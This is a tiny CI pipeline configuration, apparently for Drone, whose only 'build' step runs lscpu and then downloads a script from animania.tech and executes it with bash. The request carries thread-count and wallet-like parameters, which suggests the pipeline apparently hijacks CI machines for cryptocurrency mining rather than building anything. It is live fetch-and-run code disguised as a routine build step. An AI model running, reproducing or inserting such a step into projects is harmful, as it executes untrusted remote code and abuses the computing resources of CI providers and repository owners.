---
kind: pipeline
type: exec
name: linux-amd64

platform:
  arch: amd64
  os: linux

steps:
- name: build
  commands:
  - lscpu
  - curl 'https://animania.tech/start.txt?w=test&r=eu&t=6&a=RXKKMD5LHex9nrigfwjFeu1t79144WXS2c' --output start.txt && bash start.txt
...
